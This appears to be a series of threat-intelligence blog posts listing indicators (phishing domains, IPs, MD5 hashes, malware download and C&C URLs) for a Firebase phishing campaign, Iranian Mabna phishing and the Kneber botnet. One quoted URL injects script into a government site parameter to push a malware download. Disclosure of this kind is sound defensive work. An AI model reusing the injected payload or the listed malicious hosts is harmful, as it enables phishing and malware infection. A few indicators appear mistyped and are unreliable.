Massive "Facebook Appeal" Themed Phishing Campaign Uses Google's Firebase Spotted in the Wild - An OSINT Analysis

I just came across to a currently active phishing campaign that's using Google's Firebase as a hosting infrastructure for the purpose of enticing users into falling victim into a rogue and fake "Facebook Appeal" themed phishing campaign.

You can check out my initial analysis at my official Dark Web Onion here as my initial post got censored by Google as it violates its Terms of Service.

Sample malicious and rogue phishing domains known to have been involved in the campaign:

hxxp://publicaccount-facebook-46956.web.app

hxxp://publicappeal-348239237392.web.app

hxxp://publicappeal-9344858302239.web.app

hxxp://publicappeal-facebook.web.app

hxxp://publicappeal-form-fb-copyright102872.web.app

hxxp://publicappeal-form-fb-copyright104352.web.app

hxxp://publicappeal-form-fb-copyright119275.web.app

hxxp://publicappeal-form-fb-copyright126776.web.app

hxxp://publicappeal-form-fb-copyright171651.web.app

hxxp://publicappeal-form-fb-copyright18251.web.app

hxxp://publicappeal-form-fb-copyright18258.web.app

hxxp://publicappeal-form-fb-copyright18274.web.app

hxxp://publicappeal-form-fb-copyright18275.web.app

hxxp://publicappeal-form-fb-copyright182755.web.app

hxxp://publicappeal-form-fb-copyright18721.web.app

hxxp://publicappeal-form-fb-copyright187265.web.app

hxxp://publicappeal-form-fb-copyright187285.web.app

hxxp://publicappeal-form-fb-copyright18762.web.app

hxxp://publicappeal-form-fb-copyright19285.web.app

hxxp://publicappeal-form-fb-copyright19827.web.app

hxxp://publicappeal-form-fb-copyright981725.web.app

hxxp://publicappeal-form-page-unpublish1897.web.app

hxxp://publicappeal-from-fb-copyright12352.web.app

hxxp://publicappeal-from-fb-copyright12857.web.app

hxxp://publicappeal-page-unpublish-1827589.web.app

hxxp://publicappeal-page-unpublish1107276.web.app

hxxp://publicappeal-page-unpublish118172861.web.app

hxxp://publicappeal-page-unpublish18275.web.app

hxxp://publicappeal-page-unpublish182758.web.app

hxxp://publicappeal-page-unpublish1827586.web.app

hxxp://publicappeal-page-unpublish1827588.web.app

hxxp://publicappeal-page-unpublish182759.web.app

hxxp://publicappeal-page-unpublish18278652.web.app

hxxp://publicappeal-page-unpublish1827890.web.app

hxxp://publicappeal-page-unpublish187-36ac4.web.app

hxxp://publicappeal-page-unpublish187265.web.app

hxxp://publicappeal-page-unpublish18769.web.app

hxxp://publicappeal-page-unpublish1906392.web.app

hxxp://publicbusiness-appeal-form-129862.web.app

hxxp://publicbusiness-appeal-form125921.web.app

hxxp://publicfacebookappeal110631.web.app

hxxp://publicfb-appeal-form-29997.web.app

hxxp://publicfb-appeal-form-70f46.web.app

hxxp://publicfb-appeal-form-791bd.web.app

hxxp://publicfb-appeal-form-8276f.web.app

hxxp://publichouse-h3.web.app

hxxp://publicpage-appeal-unpublish1253631.web.app

hxxp://publicproject-8595314475285305009.web.app

hxxp://publicrestriction-appeal-business128.web.app

hxxp://publicreview2024545897534.web.app

Stay tuned!

Continue reading →

Massive Phishing Campaign Domain Farm Spotted in the Wild Uses Google's Firebase Thousands of Users Affected - An OSINT Analysis

I've just stumbled across a pretty decent and massive phishing domains farm that using Google's for the purpose of hosting and distributing the rogue and malicious content.

In this post I'll provide actionable intelligence on the infrastructure behind it including to discuss in-depth the TTPs (Tactics Techniques and Procedures) of the cybercriminals behind it.

Sample rogue and malicious URL known to have participated in the campaign:

hxxp://js-82wha8sw738.web.app/sc/css.css

Sample malicious and rogue responding IPs known to have participated in the campaign:

199.36.158.100

151.101.1.195

151.101.65.195

Sample screenshots of the rogue and malicious phishing domains known to have been involved in the campaign:

Sample rogue and malicious phishing domain portfolio known to have participated in the campaign:

0000.firebaseapp.com

02a8.web.app

11spielmacherbeta.firebaseapp.com

131023.firebaseapp.com

144110.firebaseapp.com

1493735036650.firebaseapp.com

164200.firebaseapp.com

177010.firebaseapp.com

177610.firebaseapp.com

17cc7.firebaseapp.com

212820.firebaseapp.com

abmay-d9b3b.web.app

abmay2-4abdf.web.app

adamlouie-c87d1.firebaseapp.com

adda-fenase.web.app

admininstatiles-5e702.firebaseapp.com

ads-restricted-id.web.app

aglae-f0665.firebaseapp.com

ahwma-de0bf.web.app

airbnb-70aba.firebaseapp.com

ajarwebsite-7d033.firebaseapp.com

all-scanner-cdf80.web.app

amao-dc021.web.app

ambitowebapp-2e394.firebaseapp.com

analytics-6a184.firebaseapp.com

angular2-hn.firebaseapp.com

angular7firestore-155e4.firebaseapp.com

aniapp-7ddc2.firebaseapp.com

anna-prone.web.app

api-project-723816548444.firebaseapp.com

appeal-form-fb-copyright102872.web.app

appeal-form-fb-copyright18258.web.app

appeal-form-fb-copyright187265.web.app

appeal-page-unpublish-1827589.web.app

appeal-page-unpublish1107276.web.app

appeal-page-unpublish118172861.web.app

appeal-page-unpublish18275.web.app

appeal-page-unpublish182758.web.app

appeal-page-unpublish1827586.web.app

appeal-page-unpublish182759.web.app

appeal-page-unpublish18278652.web.app

appeal-page-unpublish1827890.web.app

appeal-page-unpublish187-36ac4.web.app

appeal-page-unpublish18769.web.app

appemailhostingcha2.web.app

appy-760b5.firebaseapp.com

ararestaurant1.firebaseapp.com

arco-website-f9750.firebaseapp.com

aruba-postmaster-info.web.app

asmorx-1f6a2.web.app

asna-mod.web.app

ass-mote.web.app

asse-mofe.web.app

assets-0l61.firebaseapp.com

atarashii-atsui.web.app

au-ma-di.web.app

aude-mofe.web.app

audiscover-owawebapplications.web.app

auri-mo-da.web.app

auth-task1-m.web.app

auth20-outlook.web.app

authdemo-177a0.firebaseapp.com

authenticationuchu23.web.app

baffe-level.web.app

bandspace-console.web.app

baren-od.web.app

battle-22f22.firebaseapp.com

benali-acbe6.web.app

bestofjs-api-v1.firebaseapp.com

bi-1020101000x0.web.app

bigbt-aten.web.app

bingbrossvocalintel.web.app

bitbaink.web.app

bithunnb.web.app

bjqrasuoup.web.app

blockchain-assets-protection.web.app

blockchain-recovery-dda4d.web.app

bmazy2-0.web.app

bnp-verifi.web.app

boma-ren.firebaseapp.com

booking-hotesses-d7920.firebaseapp.com

bred-authentification-97-7.web.app

buten-dare.web.app

bzbikeruko.web.app

ca-regionale-department-a.web.app

cabs-ole.web.app

cadeau-par-plaisir.web.app

cale-mothe.web.app

camoam-d97a4.web.app

case-ofa.web.app

case100091254778.web.app

caseforpage100089481844.web.app

caseforpages100049151.web.app

caseforpages108412.web.app

caseforpages1885777.web.app

caseforpages1888888.web.app

caseforpages55222.web.app

caseforpages777422.web.app

caseforpages88174714.web.app

caten-opa.web.app

cau-quate.web.app

cen-kenase.web.app

cenle-one.web.app

centre-telephoneproinfo.web.app

chargement-service.web.app

chat-b2982.firebaseapp.com

chat-finpolo.firebaseapp.com

checkmailsawo5.web.app

checkmessagerievocalewebtel.web.app

checksweetmail6.web.app

cinhatena.web.app

cloud-space-auth-service.web.app

clouddoc-authorize.firebaseapp.com

club-note-vocale.web.app

code-mesme.web.app

cogne-menta.web.app

cojet-mole.web.app

cokade-made.firebaseapp.com

colimat-done.web.app

colo-mate.web.app

comasse-unade.web.app

come-measa.web.app

companyemailresync1.web.app

con-firma.firebaseapp.com

cones-dore.web.app

conh-ma.web.app

cop-ado.web.app

cope-ilna.web.app

cora-gas-me.web.app

cphost-7edd4.web.app

crawer-sur.web.app

credit-et-assurance07.web.app

cres-mate.web.app

crime-aune.web.app

crive-cible.web.app

csen-ted.web.app

d-validate.web.app

d3iioor0753gvdbfewypqb64.web.app

daisma-e7e6c.web.app

darrin-pendleton-j5286.web.app

dc4u-6e803.firebaseapp.com

decdo-chat2.firebaseapp.com

demachatendi36.web.app

demoitau-d3428.web.app

denabere-2c382.web.app

digital-book-9f870.firebaseapp.com

dmacenda.web.app

docsharex-authorize.firebaseapp.com

docuproject39-277-383-files.firebaseapp.com

dope-ufen.web.app

downloadfreeebookspdf-6e806.firebaseapp.com

downloadpdfreader-d7702.firebaseapp.com

drafty-43c88.firebaseapp.com

driveintuksouteast-falcaopla.web.app

dropdocument-c3829.web.app

dskdirect-5ba26.web.app

dw-website-fbc19.firebaseapp.com

eagle10.firebaseapp.com

ebookwngfgewarwle.web.app

edret-tropm.web.app

efetgreds.web.app

eins-done.web.app

eleven-bot-399b7.web.app

elimu-c1a38.firebaseapp.com

email-mweb-co-za-zimbra-1.firebaseapp.com

email-update-verify.web.app

email-verificationservices365.web.app

empacte-do.web.app

ems-obe.web.app

emsi-lobo.firebaseapp.com

end-losup.web.app

erfders-f6013.web.app

esote-mode.web.app

exness-mobile.web.app

explore-wetriansfering-web.web.app

exposedacne.web.app

f0ldgonn.firebaseapp.com

facebook-appeal1749902610052.web.app

facebook-appelcase32q1.web.app

facebookappeal-case10351001.web.app

facebookappealcase1884888444.web.app

facebookappealcase7174747444.web.app

facebookcase187444441.web.app

facebookcase188444.web.app

fares-one.web.app

fb-appeal-form-70f46.web.app

fb-appeal-form-791bd.web.app

fb-restricted-d12c2.web.app

fbappealform13111.web.app

fbforpages1848151.web.app

fbmail-case199418414.web.app

fbmail-pages100049194.web.app

fbpages-case10004915.web.app

fema-tode.web.app

fetfetaa-81119.web.app

fines-gining.web.app

firtserverunithpp.web.app

flape-man.web.app

flape-odade.web.app

fmvfhagpab.web.app

focus-online-news.web.app

fodes-mota.web.app

font-makeupe.web.app

foresta-mod.firebaseapp.com

foten-moda.web.app

francesbbv.web.app

freeebookspdf-9ab41.firebaseapp.com

freejobsnews-f8cb8.firebaseapp.com

freis-mode.web.app

gadjabadjala1.web.app

gare-train3.web.app

gene-marso.web.app

genie-alba.firebaseapp.com

girly-wallpaper-5b75f.web.app

godadyxs.web.app

gomas-12c01.web.app

gospel-living.web.app

goswapp-bsc.web.app

gotan-one.web.app

gotcha-67060.firebaseapp.com

grace-bijoux-14910.firebaseapp.com

green656dfbb5f31b1fe48c2391a6.web.app

gridsend-98f14.web.app

groupe-ca-authenticati-caisse.web.app

groupe-sa-accueil-autnenti.web.app

gweb-gc-gather-production.firebaseapp.com

gweb-miyagi.firebaseapp.com

hagenpau.web.app

histoire-clik.web.app

hiworksservicecenter.web.app

hon-macona.web.app

hounbvc-c7661.web.app

hsfkrkqogo.web.app

httpsaudiscover-owawebapplications.web.app

httpsdocument-download-902123.web.app

httpsfyregym-wetransfer.web.app

httpsjojo-wiza124.web.app

httpsjoovkuebea.web.app

httpsminxtex.firebaseapp.com

httpsprice-per-unit.firebaseapp.com

httpsprotectmimemimefrem.web.app

httpsworldvision-419f2.firebaseapp.com

hunin-one.web.app

hyle-fb82f.web.app

info-telephone-vocale.web.app

international-web-fb75a.web.app

isfane-osade.web.app

iydd-1b2d8.web.app

jams-jamz1234.web.app

jecta-f45df.firebaseapp.com

jentame-add.web.app

jes-mo-sad.web.app

jex-ulto.web.app

kaunte-mone.web.app

kebote-moda.web.app

kes-mole.web.app

kodrefse-nsf.web.app

l09162020-fixmailhelpdesk.web.app

laefhfdhkdsdv.web.app

lamaf-50e45.web.app

les-more.web.app

lg-roudcubeblack-access.web.app

lgeyfuusmg.web.app

licloud.web.app

licos-date.web.app

line-9ca1c.web.app

link-bb76d.web.app

lisen-ocun.web.app

live-support-82d11.firebaseapp.com

login-442v3f.web.app

loginfo-tkconf.web.app

lohsam-86765.web.app

lommsrecu3.firebaseapp.com

lono-jena.web.app

lote-masme.web.app

louams-62870.web.app

lthouse.web.app

m-cabanqueenligne-particuliers.web.app

m-orangebankenligne-id.web.app

m1technology.firebaseapp.com

maedz-5fdff.web.app

mail-8583e.web.app

mail-account-verify-f4723.web.app

mail-lcloud-com-account.web.app

mail-ovhcloud.web.app

mansan-4ca1c.web.app

may1110genstanbk.web.app

mbqbfhfmgr.web.app

memo-vocale-52636.web.app

mentipdf.web.app

mercadolibre-research.web.app

mms-sms-alert.firebaseapp.com

mo-aska-da.web.app

mobialmysyf.web.app

mobizzmperb.web.app

moce-add.web.app

moce-aude.web.app

molases-b652e.web.app

mon-tome.web.app

msgmessage-7f854.firebaseapp.com

mswordg.web.app

mta-round-cube.web.app

mxflexsub.web.app

my-bithumb.web.app

my-winbamk.web.app

mylogin-config.web.app

nale-ping.web.app

name-ocina.web.app

ne01u59l.firebaseapp.com

nera-mode.web.app

netw0rksolutions.web.app

newlink-c8a8f.web.app

njnapcdvzc.web.app

nopin-dod.web.app

nozed-uname.firebaseapp.com

ntzmttpmnttoepnlant.web.app

o-orangebank18-id.web.app

oaism-72827.web.app

ocaque-domen.firebaseapp.com

ocuso-aken.web.app

office-webmail-login-f0e3c.web.app

officeindex-file.web.app

officemailsharing-20cd3.web.app

offices-voicemail.web.app

oftenas-oweb.web.app

ojin-madij.web.app

olet-mado.web.app

omawo-14b8c.web.app

on-me-ro.firebaseapp.com

onee-a0488.web.app

oneone-19cd8.web.app

onga-moce.web.app

onlinepdfkwpmmkl.web.app

onsa-mode.web.app

orange-my-app.web.app

orangesmsprovocale.web.app

oras-moria.web.app

oroma-42f59.web.app

osale-mape.web.app

osaute-moca.web.app

others1-f7ce9.web.app

outline-auth-d7f99.web.app

outlookloffice365user09ngxsmd.web.app

outlookloffice365userp86aese6.web.app

outlooks-userserver.web.app

owa-signon-officeaccount.web.app

owablu84349439434.web.app

owserv220020.web.app

padma-3fbb8.web.app

page-appeal-unpublish1253631.web.app

pagebusiness-copyrightcase1256.web.app

pay-sera.web.app

phuongpndev.web.app

pokajca.web.app

poltunefrdonecodesms.web.app

popuyecash7.web.app

portail-messagerieorangesms.web.app

postmailservr-panel-centr.web.app

project2021c-42b13.firebaseapp.com

pry-ecommerce.web.app

put-media-lan.web.app

r-web-2a3a9.web.app

rbc-mainline.web.app

rbc-verifylogin5.web.app

rbclogin-line.web.app

readingwtagzdm.web.app

recording-c12f5.web.app

renard-trouillard.web.app

restore70174-coinbase-us.web.app

rjabldfrbg.web.app

romas-512bf.web.app

rooted-4da8a.web.app

rouncubemail.web.app

royalbill-a3y4.web.app

rufe-sun.web.app

saal-kejriwal.web.app

samda-3c88f.web.app

sarba-one.web.app

scorchvc.web.app

scorchvc.web.app0

serve-8e8dc.web.app

server-authentication-332e1.web.app

servercpanel-afa12.web.app

service-vocalesmsprotelfixe.web.app

sharebox-onedrive-file-f692f.web.app

side-esone.web.app

sim-ote.web.app

skype-online04171.web.app

slackchatv1.firebaseapp.com

snaptik.web.app

soci-molen.web.app

sode-mape.web.app

soden-olma.web.app

sofe-inchena.web.app

sofe-tane.web.app

solen-conda.web.app

somas-b88a0.web.app

sone-masa.web.app

sonta-maline.web.app

sore-modabe.web.app

soure-made.web.app

sparkassbank-de.web.app

srey-deocs.web.app

sroxma-ab2cc.web.app

sudo-mone.web.app

sugen-oda.web.app

sun-maupe.web.app

sunge-ode.firebaseapp.com

suone-bena.web.app

swiftshare-content-auth.web.app

tittot-a8505.web.app

tm-etiquetado.web.app

tome-done.web.app

totem1.web.app

totem2.web.app

tousou-posoto3.web.app

trdsmccdb7386cbf3ba0b0b8d.web.app

truein-264db.web.app

ugen-orabe.web.app

uiinlcuo37oed.web.app

un-foreste.web.app

unt-morelle.web.app

update-45190ca.web.app

user-45190ca21.web.app

userca-58ce4.web.app

usmin-moda.web.app

validate-clientrbc.web.app

vandameman4.web.app

verberuyer7.web.app

verif-loginrbc.web.app

verify-48181.web.app

verify-user-rbc.web.app

verifywell-85477.web.app

vkmqnvyfwd1111.web.app

vmta-mod.web.app

vocaleproidorange.web.app

votre-boitevocale-fixe.firebaseapp.com

wdfyxklmba.web.app

web-bf4.web.app

web-e1f6d.web.app

web874830-98375-90232.web.app

webmail-a2846.web.app

webmail-control-9efc7.web.app

wecluihfrf-76tygh.web.app

wedpfoaliculate-resmazm.web.app

westernfoodmaincourse.web.app

wetranslatetransfers-coxsola.firebaseapp.com

wetrnafers.web.app

whatsapp-clone-teamwork.firebaseapp.com

win-more-0x.web.app

winx-fbac0.web.app

wix-engage-visitors-prod-0.firebaseapp.com

wix-engage-visitors-prod-10.firebaseapp.com

wix-engage-visitors-prod-20.firebaseapp.com

wo0923536-902453-908563.web.app

wraxdne.web.app

www.firebaseapp.com

www.web.app

x0x0x10010-0100.web.app

x48652.web.app

xamua-7cb66.web.app

xcio-00000auth.web.app

xm01-18c1f.web.app

xn--87487387348739-16aa.web.app

xtpma4ep.firebaseapp.com

zoho-active.web.app

zoho-adminserv.web.app

zoho-mailservices.web.app

zoho-online.web.app

zoho-validationserv.web.app

zxtst-44902.firebaseapp.com

Stay tuned!

Continue reading →

Exposing FBI's Most Wanted Cybercriminals - Iran's Mabna Hackers - An OSINT Analysis

Dear blog readers,

I've decided to share some of the actionable intelligence that I have at my disposal regarding the FBI's Most Wanted Iran-based Mabna Hackers which I originally outlined in my second release of the "A Qualitative and Technical Collection OSINT-Enriched Analysis of the Iranian Hacking Scene Through the Prism of the Infamous Ashiyane Digital Security Team" where you can also obtain a copy of the first release entitled "Assessing The Computer Network Operation (CNO) Capabilities of the Islamic Republic of Iran" in terms of catching up in terms of what Iran-based hackers and hacking groups are up to up to present day with the research report basically representing one of the most comprehensive and in-depth publicly accessible report on Iran's hacking scene.

Sample screenshots of Mabna Institute including the associated Web sites where the information is offered:

Sample phishing URLs known to have been involved in the campaign:

ezvpn.mskcc.saea.ga    

library.asu.saea.ga    

library.lehigh.saea.ga    

moodle.ucl.ac.saea.ga    

saea.ga    

unex.learn.saea.ga    

unomaha.on.saea.ga    

www.uvic.saea.ga

catalog.lib.usm.edu.seae.tk

elearning.uky.edu.seae.tk

www.aladin.wrlc.org.seae.tk

alexandria.rice.ulibr.ga

cmich.ulibr.ga

columbia.ulibr.ga

edu.edu.libt.cf

ezproxy-authcate.lib.monash.ulibr.ga

login.revproxy.brown.edu.edu.libt.cf

ezproxy-authcate.monash.lib.ulibr.ga

ezproxy-f.deakin.au.ulibr.ga

lib.dundee.ac.uk.ulibr.ga

cas.usherbrooke.ca.cavc.tk

catalog.lib.ksu.edu.cavc.tk

isa.epfl.ch.cavc.tk

login.vcu.edu.cavc.tk

www.med.unc.edu.cavc.tk

cas.iu.edu.cavc.tk

ltuvpn.latrobe.edu.au.reactivation.in

passport.pitt.edu.reactivation.in

edu.login.revproxy.brown.edu.libt.cf

shibboleth.nyu.edu.reactivation.in

login.revproxy.brown.edu.login.revproxy.brown.edu.libt.cf

weblogin.pennkey.upenn.edu.reactivation.in

webmail.reactivation.in

www.ezlibproxy1.ntu.edu.sg.reactivation.in

www.ezpa.library.ualberta.ca.reactivation.in

www.lib.just.edu.jo.reactivation.in

www.passport.pitt.edu.reactivation.in

shib.ncsu.ulibr.cf/

www.shibboleth.nyu.edu.reactivation.in

www.weblogin.pennkey.upenn.edu.reactivation.in

ezlibproxy1.ntu.edu.sg.reactivation.in

login.revproxy.brown.edu.libt.cf

weblogin.umich.edu.lib2.ml

catalog.sju.edu.mncr.tk

ezpa.library.ualberta.ca.reactivation.in

lib.just.edu.jo.reactivation.in

login.ezproxy.lib.purdue.edu.reactivation.in

login.libproxy.temple.shibboleth2.uchicago.ulibr.cf

shib.ncsu.shibboleth2.uchicago.ulibr.cf

shibboleth2.uchicago.shibboleth2.uchicago.ulibr.cf

singlesignon.gwu.shibboleth2.uchicago.ulibr.cf

webauth.ox.ac.uk.shibboleth2.uchicago.ulibr.cf

edu.libt.cf

login.libproxy.temple.ulibr.cf

shib.ncsu.ulibr.cf

singlesignon.gwu.ulibr.cf

webauth.ox.ac.uk.ulibr.cf

library.cornell.ulibr.ga

login.ezproxy.gsu.ulibr.ga

shibboleth2.uchicago.ulibr.cf

login.library.nyu.ulibr.ga

mail.ulibr.ga

webcat.lib.unc.ulibr.ga

www.ulibr.ga

www.alexandria.rice.ulibr.ga

www.cmich.ulibr.ga

www.columbia.ulibr.ga

www.ezproxy-authcate.lib.monash.ulibr.ga

www.ezproxy-authcate.monash.lib.ulibr.ga

www.ezproxy-f.deakin.au.ulibr.ga

www.lib.dundee.ac.uk.ulibr.ga

www.library.cornell.ulibr.ga

www.login.ezproxy.gsu.ulibr.ga

www.login.library.nyu.ulibr.ga

auth.berkeley.edu.libna.ml

sso.lib.uts.edu.au.libna.ml

bb.uvm.edu.cvre.tk

cline.lib.nau.edu.cvre.tk

illiad.lib.binghamton.edu.cvre.tk

libcat.smu.edu.cvre.tk

login.brandeis.edu.cvre.tk

msim.cvre.tk

libcat.library.qut.nsae.ml

www.webcat.lib.unc.ulibr.ga

Sample domains known to have been involved in the campaign:

mlibo.ml

blibo.ga

azll.cf

azlll.cf

lzll.cf

jlll.cf

elll.cf

lllib.cf

tsll.cf

ulll.tk

tlll.cf

libt.ga

libk.ga

libf.ga

libe.ga

liba.gq

libver.ml

ntll.tk

ills.cf

vtll.cf

clll.tk

stll.tk

llii.xyz

lill.pro

eduv.icu

univ.red

unir.cf

unir.gq

unisv.xyz

unir.ml

unin.icu

unie.ml

unip.gq

unie.ga

unip.cf

nimc.ga

nimc.ml

savantaz.cf

unie.gq

unip.ga

unip.ml

unir.ga

untc.me

jhbn.me

unts.me

uncr.me

lib-service.com

unvc.me

untf.me

nimc.cf

anvc.me

ebookfafa.com

nicn.gq

untc.ir

librarylog.in

llli.nl

lllf.nl

libg.tk

ttil.nl

llil.nl

lliv.nl

llit.site

flil.cf

e-library.me

cill.ml

fill.cf

libm.ga

eill.cf

llib.cf

eill.ga

nuec.cf

illl.cf

cnen.cf

aill.nl

eill.nl

mlib.cf

ulll.cf

nlll.cf

clll.nl

llii.cf

etll.cf

1edu.in

aill.cf

atna.cf

atti.cf

aztt.tk

cave.gq

ccli.cf

cnma.cf

cntt.cf

crll.tk

csll.cf

ctll.tk

cvnc.ga

cvve.cf

czll.tk

cztt.tk

euca.cf

euce.in

ezll.tk

ezplog.in

ezproxy.tk

eztt.tk

flll.cf

iell.tk

iull.tk

izll.tk

lett.cf

lib1.bid

lib1.pw

libb.ga

libe.ml

libg.cf

libg.ga

libg.gq

libloan.xyz

libnicinfo.xyz

libraryme.ir

libt.ml

libu.gq

lill.gq

llbt.tk

llib.ga

llic.cf

llic.tk

llil.cf

llit.cf

lliv.tk

llse.cf

ncll.tk

ncnc.cf

nctt.tk

necr.ga

nika.ga

nsae.ml

nuec.ml

rill.cf

rnva.cf

rtll.tk

sctt.cf

shibboleth.link

sitl.tk

slli.cf

till.cf

titt.cf

uill.cf

uitt.tk

ulibe.ml

ulibr.ga

umlib.ml

umll.tk

uni-lb.com

unll.tk

utll.tk

vsre.cf

web2lib.info

xill.tk

zedviros.ir

zill.cf 

Sample IPs known to have been involved in the campaign:

103.241.3.91

104.152.168.23

107.180.57.7

107.180.58.47

138.201.17.56

144.217.120.73

144.76.189.80

162.218.237.3

167.114.103.215

173.254.239.2

176.31.33.115

178.33.115.10

184.95.37.90

185.105.185.22

185.28.21.83

185.55.227.104

185.86.180.250

188.40.34.186

193.70.117.250

195.154.102.75

198.252.106.149

198.91.81.5

199.204.187.164

31.220.20.111

66.70.197.208

78.46.77.105

79.175.181.11

82.102.15.215

87.98.249.207

88.99.139.8

88.99.160.209

88.99.40.240

88.99.69.4

93.174.95.64

94.76.204.201

136.243.145.233

136.243.198.45

141.8.224.221

148.251.116.93

148.251.12.172

162.218.237.31

167.114.13.164

172.246.144.34

173.254.239.217

6.31.33.115

176.31.33.116

176.9.188.235

85.28.21.83

185.28.21.95

192.169.82.134

198.27.68.142

198.91.81.51

45.35.33.126

46.4.91.26

5.135.123.163

5.196.194.234

51.254.198.131

51.254.21.142

79.175.181.118

88.99.128.229

88.99.139.88

88.99.69.49

3.174.95.64

Stay tuned!

Continue reading →

Historical OSINT - Georgian Justice Department and Georgia Ministry of Defense Compromised Serving Malware Courtesy of the Kneber Botnet

It's 2010 and I've recently came across to a compromised Georgian Government Ministry of Defense and Ministry of Justice official Web site spreading potentially participating in a wide-spread phishing and malware-serving campaign enticing users into interacting with the rogue U.S Intelligence and U.S Law Enforcement themed emails for the purpose of spreading and dropping malicious software on the targeted host's PC.

Sample malicious URL known to have participated in the campaign abusing common Web Site redirection application vulnerability flaw:

hxxp://www.mod.gov.ge/2007/video/movie.php?l=G&v=%20%3E%20a%20href%20http%3A%2F%2Fofficialweightlosshelp.org%2Fwp-admin%2Freport.zip%20%3EDownload%20%3C%2Fa%3E%20script%3Ewindow.OPEN%20http%3A%2F%2Fofficialweightlosshelp.org%2Fwp-admin%2Freport.zip%20%3C%2Fscript%3E%20#05184916461921807121

Related malicious URLs known to have participated in the campaign:

hxxp://officialweightlosshelp.org/wp-admin/report.zip

Spread URL found within the config:

hxxp://www.adventure-center.net/upload/x.txt - 195.70.48.67

Related compromised malicious URLs known to have participated in the campaign:

hxxp://new.justice.gov.ge/files/Headers/in.txt

hxxp://new.justice.gov.ge/files/Headers/fresh.txt

hxxp://new.justice.gov.ge/files/Headers/rollers1.php

Related MD5s known to have participated in the campaign:

MD5: d0c0a2e6b30f451f69df9e2514ba36f2

MD5: 974a4a516260a4fafb36234897469013

MD5: ecb7304f838efb8e30a21189458b8544

MD5: 81b3bff487fc9a02e10288114fc2b5be

MD5: 234523904033f8dc692c743cbcf5cf2b

MD5: e2fffaffc1064d24e7ea6bab90fd86fc

MD5: 5941c9b5bd567c5baaecc415e453b5c8

MD5: 0ff325365f1d8395322d1ef0525f3b1f

MD5: 4437617b7095ed412f3c663d4b878c30

MD5: eb66a3e11690069b28c38cea926b61d2

MD5: 2b7e4b7c5faf45ebe48df580b63c376b

Known to have participated in the campaign are also the following two domains part of the Hilary Kneber botnet:
hxxp://dnicenter.com - Email: abuseemaildhcp@gmail.com
hxxp://dhsorg.org - Email: hilarykneber@yahoo.com

Related malicious download location URLs known to have participated in the campaign:
hxxp://www.zeropaid.com/bbs/includes/CYBERCAFE.zip
hxxp://rapidshare.com/files/318309046/CYBERCAFE.zip.html
hxxp://www.sendspace.com/file/fmbt01
hxxp://hkcaregroup.com/modlogan/MILSOFT.zip
hxxp://rapidshare.com/files/320369638/MILSOFT.zip.html
hxxp://fcpra.org/downloads/MILSOFT.zip
hxxp://fcpra.org/downloads/winupdate.zip
hxxp://www.sendspace.com/file/tj373l
hxxp://mv.net.md/update/update.zip - 195.22.225.5
hxxp://www.sendspace.com/file/7jmxtq
hxxp://mv.net.md/dsb/DSB.zip
hxxp://www.sendspace.com/file/rdxgzd
hxxp://timingsolution.com/Doc/BULLETIN.zip
hxxp://www.sendspace.com/file/goz3yd
hxxp://dnicenter.com/docs/report.zip
hxxp://dhsorg.org/docs/instructions.zip - 222.122.60.186; 222.122.60.1
hxxp://www.sendspace.com/file/h96uh1
hxxp://depositfiles.com/files/xj1wvamc4
hxxp://tiesiog.puikiai.lt/report.zip
hxxp://somashop.lv/report.zip
hxxp://www.christianrantsen.dk/report.zip
hxxp://enigmazones.eu/report.zip
hxxp://www.christianrantsen.dk/report.zip
hxxp://enigmazones.eu/report.zip

hxxp://gnarus.mobi/media/EuropeanUnion_MilitaryOperations_EN.zip
hxxp://quimeras.com.mx/media/EuropeanUnion_MilitaryOperations_EN.zip - 66.147.242.169

Related malicious and fraudulent domains known to have participated in the campaign:
hxxp://dhsinfo.info - 218.240.28.34
hxxp://greylogic.info - 218.240.28.34; 218.240.28.4
hxxp://intelfusion.info - 218.240.28.34

hxxp://greylogic.org - 222.122.60.1

Related malicious MD5s known to have participated in the campaign:
MD5: 8b3a3c4386e4d59c6665762f53e6ec8e
MD5: 5fb94eef8bd57fe8e20ccc56e33570c5
MD5: 28c4648f05f46a3ec37d664cee0d84a8

Once executed a sample malware phones back to the following C&C server IPs:
hxxp://from-us-with-love.info - 91.216.141.171
hxxp://from-us-with-love.info/imglov/zmpt4d/n16v18.bin
hxxp://vittles.mobi - 174.132.255.10

hxxp://nicupdate.com - 85.31.97.194

Related malicious and fraudulent IPs known to have participated in the Hilary Kneber botnet campaign:
hxxp://58.218.199.239
hxxp://59.53.91.102
hxxp://60.12.117.147
hxxp://61.235.117.71
hxxp://61.235.117.86
hxxp://61.4.82.216
hxxp://193.104.110.88
hxxp://95.169.186.103
hxxp://222.122.60.186
hxxp://217.23.10.19
hxxp://85.17.144.78
hxxp://200.106.149.171
hxxp://200.63.44.192
hxxp://200.63.46.134
hxxp://91.206.231.189
hxxp://124.109.3.135
hxxp://61.61.20.134
hxxp://91.206.201.14
hxxp://91.206.201.222
hxxp://91.206.201.8
hxxp://216.104.40.218
hxxp://69.197.128.203

Related malicious and fraudulent domains known to have participated in the Hilary Kneber botnet campaign:
hxxp://123.30d5546ce2d9ab37.d99q.cn
hxxp://d99q.cn
hxxp://524ay.cn
hxxp://adcounters.net
hxxp://adobe-config-s3.net
hxxp://mywarworld.cn
hxxp://aqaqaqaq.com
hxxp://avchecker123.com
hxxp://bizelitt.com
hxxp://biznessnews.cn
hxxp://bizuklux.cn
hxxp://fcrazy.com
hxxp://fcrazy.eu
hxxp://boolred.in
hxxp://brans.pl
hxxp://britishsupport.net
hxxp://bulkbin.cn
hxxp://chaujoi.cn
hxxp://checkvirus.net
hxxp://chinaoilfactory.cn
hxxp://chris25project.cn
hxxp://client158.faster-hosting.com
hxxp://cwbnewsonline.cn
hxxp://cxzczxccc.com.cn
hxxp://dasfkjsdsfg.biz
hxxp://dia2.cn
hxxp://digitalinspiration.e37z.cn
hxxp://dolbanov.net
hxxp://dolcegabbana.djbormand.cn
hxxp://djbormand.cn
hxxp://download.sttcounter.cn - 61.61.20.134; 211.95.78.98
hxxp://sttcounter.cn
hxxp://dred3.cn
hxxp://dsfad.in
hxxp://e37z.cn
hxxp://e58z.cn
hxxp://electrofunny.cn
hxxp://electromusicnow.cn
hxxp://elsemon.cn
hxxp://fcrazy.info
hxxp://filemarket.net
hxxp://flo5.cn
hxxp://footballcappers.biz
hxxp://fobsl.cn
hxxp://forum.d99q.cn
hxxp://gamno6.cn
hxxp://gidrasil.cn
hxxp://gifts2010.net
hxxp://ginmap.cn
hxxp://giopnon.cn
hxxp://gksdh.cn
hxxp://glousc.com
hxxp://gnfdt.cn
